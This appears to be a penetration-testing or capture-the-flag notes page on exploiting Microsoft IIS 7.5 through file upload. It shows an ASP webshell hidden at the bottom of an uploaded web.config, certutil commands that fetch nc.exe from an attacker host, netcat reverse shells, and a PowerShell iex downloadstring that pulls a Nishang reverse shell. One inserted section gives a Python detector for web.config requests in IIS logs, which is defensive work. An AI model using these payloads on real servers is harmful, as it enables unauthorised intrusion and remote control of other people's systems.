# IIS

## IIS Versions

* <https://en.wikipedia.org/wiki/Internet_Information_Services>
* REF: [IIS6WebDav](/04-webapps/iis6-webdav.md)

```
80 http Microsoft IIS httpd 7.5

IIS 7.5 = Windows 2008 R2
```

## IIS Uploads

* If you can upload to an IIS site, try different file types to see which extensions are allowed

```
test.txt        ..fail
test.asp        ..fail
test.aspx       ..fail
test.jpg        ..ok
web.config      ..ok - we can exploit
```

## RCE webconfig upload

* Old version of IIS 7.5 that accepts file uploads
* We can upload our own `web.config` that includes some evil ASP code at the bottom
* <https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/>
* <https://soroush.secproject.com/blog/tag/unrestricted-file-upload/>
* REF: [RevWebShellsAsp](/03-getting-in/03-reverseshell-php.md#asp-webshell)

```
-------------------------------
vi web.config         ..evil asp code at bottom
Response.write(1+2)   ..test will equal 3

-------------------------------
cat /opt/shells/web.aspx

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
Set cmd = rs.Exec("cmd /c ping 10.x.x.x")
o = cmd.StdOut.Readall()
Response.write(o)
%>

-------------------------------
Execute:
http://10.x.x.x/UploadedFiles/web.config

-------------------------------
Catch a ping (did my command work?)
tcpdump -i tun0 icmp
```
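
The same request seen from the detection side, as an added example that is not part of the original notes. By default IIS request filtering hides `web.config` (404.8), so a 2xx or 5xx response to a request for it in the W3C logs suggests that a handler processed an uploaded copy. The log lines, addresses and the function name `find_web_config_hits` are constructed for illustration.

```python
# Added example: flag IIS W3C log entries where a web.config request was
# answered by a handler instead of being blocked by request filtering.
# SAMPLE_LOG is constructed data using documentation-range addresses.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-01-01 10:00:01 192.0.2.10 POST /upload.aspx - 80 - 198.51.100.7 Mozilla/5.0 200 0 0 120
2024-01-01 10:00:05 192.0.2.10 GET /web.config - 80 - 198.51.100.7 Mozilla/5.0 404 8 0 3
2024-01-01 10:00:09 192.0.2.10 GET /UploadedFiles/web.config - 80 - 198.51.100.7 Mozilla/5.0 200 0 0 950
2024-01-01 10:00:12 192.0.2.10 GET /UploadedFiles/Web.Config - 80 - 198.51.100.7 Mozilla/5.0 500 0 0 40
2024-01-01 10:00:20 192.0.2.10 GET /UploadedFiles/test.jpg - 80 - 203.0.113.4 Mozilla/5.0 200 0 0 5
"""


def find_web_config_hits(log_text):
    """Return log rows (as dicts) where web.config was served with 2xx/5xx."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            # The field list can change mid-file, so re-read it every time.
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated entry
        row = dict(zip(fields, values))
        # IIS paths are case-insensitive, so compare the file name lowercased.
        name = row.get("cs-uri-stem", "").lower().rsplit("/", 1)[-1]
        status = row.get("sc-status", "")
        # 404 is the expected, blocked outcome. 2xx means content was returned;
        # 5xx means a handler ran and failed. Both deserve a look.
        if name == "web.config" and status[:1] in ("2", "5"):
            hits.append(row)
    return hits


if __name__ == "__main__":
    for hit in find_web_config_hits(SAMPLE_LOG):
        print(hit["date"], hit["time"], hit["c-ip"],
              hit["cs-uri-stem"], hit["sc-status"])
```
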

## Easy

```
-----------------------
We will use web.config exploit

First web.config will download nc
python -m SimpleHTTPServer 8080
rs.Exec("cmd /c certutil -urlcache -f http://10.x.x.x:8080/nc.exe C:\Windows\Temp\nc.exe")

Second web.config will execute nc reverse
rs.Exec("cmd /c C:\Windows\Temp\nc.exe 10.x.x.x 4444 -e cmd.exe")
nc -nvlp 4444
whoami
merlin
systeminfo


```

```

-----------------------
google iis rce upload

Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.x.x.x:8080/nc.exe C:\\users\\public\\nc.exe")
Set cmd1 = wShell1.Exec("cmd /c c:\users\public\nc.exe 10.x.x.x 4444 -e c:\windows\system32\cmd.exe")

```

```
0xdf wrote this easy one:
To download our Nishang reverse shell and execute it

prep
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Add a reverse call as the last line:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
share with python

<%@ Language=VBScript %>
<%
  call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.x.x.x/Invoke-PowerShellTcp.ps1')")
%>
```


